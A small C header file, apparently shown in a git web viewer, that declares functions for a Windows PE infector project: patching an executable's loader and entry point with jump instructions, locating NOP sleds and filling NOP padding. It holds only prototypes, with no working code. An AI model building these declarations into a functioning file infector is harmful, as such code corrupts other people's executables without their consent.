blob: d773620cef3f972af32920a8d83d5e224c55085e (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
#ifndef PATCH_H_INCLUDED
#define PATCH_H_INCLUDED
#include <windows.h>
#include "pe_infect.h"
#define SIZEOF_X86_JMP32 5
void patchRelJMP(BYTE* buf, DWORD destVA);
BOOL bPatchLoader(const struct ParsedPE* ppe);
BOOL bPatchNearEntry(const struct ParsedPE* ppe);
int offFindNopsled(const BYTE* buf, SIZE_T szBuf, SIZE_T szNopsled);
void offFillNops(BYTE* buf, SIZE_T szFill);
#endif /* PATCH_H_INCLUDED */
|